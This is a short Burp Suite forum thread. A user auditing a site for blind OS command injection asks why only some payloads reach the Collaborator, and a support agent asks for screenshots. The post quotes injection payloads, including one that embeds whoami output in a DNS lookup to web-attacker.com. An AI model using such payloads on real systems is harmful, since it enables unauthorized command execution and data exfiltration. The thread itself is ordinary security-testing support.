Burp Suite User Forum

Create new post

Command Injection Issues

Devstroi | Last updated: Dec 07, 2023 03:04AM UTC

Issue:  OS command injection Severity:  High Confidence:  Certain I am auditing a site with blind injection of commands from the burp suite repeater, the problem is that only the following command responds to me in the following way `nslookup kgji2ohoyw.web-attacker.com` The burpsuite collaborator receives the response successfully, but when trying something else like a PING or whoami for example: `nslookup `whoami`.kgji2ohoyw.web-attacker.com` ` ping -c 10 127.0.0.1 ` it does not receive a response

Dominyque, PortSwigger Agent | Last updated: Dec 07, 2023 08:31AM UTC

Hi Devstroi Can you please email support@portswigger.net with some example screenshots of the collaborator issue you are experiencing? Additionally, can you please include a screenshot of your Collabrator health check? Thank you.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.